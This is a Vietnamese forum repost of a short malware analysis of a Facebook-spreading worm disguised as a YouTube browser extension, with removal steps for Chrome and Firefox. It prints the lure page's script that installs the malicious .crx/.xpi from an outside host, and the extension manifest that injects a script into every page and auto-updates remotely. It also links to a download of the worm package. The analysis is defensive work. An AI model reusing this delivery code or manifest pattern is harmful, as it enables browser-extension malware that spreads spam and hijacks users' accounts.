Bài này của lão xnohat trên HVA, mang về đây cho anh em đọc để phòng thân .

Nên xem bài gốc: http://xnohat.blogspot.com/2011/12/r...oanh-hanh.html

****************

Mình bị con Worm này làm phiền quá, bạn bè bị dính cứ vô spam đầy cái wall của mình. Thôi thì làm một cú RE nhanh con Worm này và chỉ bà con cách gỡ bỏ con worm này khỏi trình duyệt

Con worm này xuất phát từ một trang fake FB ở địa chỉ
Mã:
http://fbviralvideos.blogspot.com/
Tại trang này chả có gì cả ngoài việc nó làm giả y chang một cái trang FB của một em hót girl nào đó bên trời tây, kèm một cái link "Cài đặt plugin" để coi em ấy show hàng. Khi click vào cái nút "Install Plugin" đó nó sẽ kích hoạt một hàm tên

PHP Code:
    <a onclick="instalar();" class="install nomargin"></a
Cái hàm này sẽ thực hiện thăm dò xem trình duyệt nạn nhân đang dùng là Firefox hay Chrome để đưa ra cái link cài Plugin giả mạo

Mã:
<script>
                        var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
                        var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
                        function instalar(){
                            if (is_chrome){
                                window.open("http://yourvidsviral.com/youtube.crx");
                            } else if(is_firefox){
                                var params = {
                                    "Youtube Extension": {
                                        URL: "http://yourvidsviral.com/youtube.xpi",
                                        toString: function () { return this.URL; }
                                    }
                                };
                                InstallTrigger.install(params);
                            } else{
                                 window.open("");
                            }
                        }
                    </script>

Cái link cài plugin xạo xạo này chính là con worm. Cái hay ở đây là con worm này không làm bằng binary mà viết bằng javascript và được đóng gói thành plugin của Chrome ( dạng crx ) và plugin của Firefox ( dạng xpi ).

Sau khi cài plugin vào thì nó sẽ kích hoạt phần chính của con worm, đây là phần chịu trách nhiệm lây lan tiếp tới các người dùng FB khác. Script này được load về từ link http://yourvidsviral.com/script.js

Kèm theo đó, trong con worm này còn được tích hợp cơ chế cập nhật thông qua tính năng cập nhật plugin tự động của Firefox hay Chrome

Mã:
    {
       "content_scripts": [ {
          "all_frames": true,
         "matches": [ "http://*/*"],
     "js": [ "go.js" ]
    } ],

       "description": "Plays Youtube Videos Online, Quickly \u0026 Efficiently",
       "icons": {
          "128": "icon128.png",
          "16": "icon16.png",
          "48": "icon48.png"
       },

       "name": "YouTube Extension",
       "permissions": [ "*://*/*" ],
       "update_url": "http://allinfree.net/chrome.xml",   "version": "1.0.3"
    }
Đã RE xong, bạn có thể tải về toàn bộ gói dữ liệu của con worm đã được RE tại đây để nghiên cứu

http://www.mediafire.com/?6vxm6a77t4x66t1

-----------------------------


Cách gỡ bỏ con Worm

Chrome: mở tab mới, vào phần Apps, kiếm cái plugin Youtube, nhấp phải chọn remove from Chrome . Xong

Firefox: vào Menu Tool -> add-on -> extensions -> chọn cái plugin Youtube rồi chọn Remove . Xong

------------------------------

RE toàn bộ con worm trong 15 phút, phá kỷ lục trước giờ của mền

xnohat (HVA)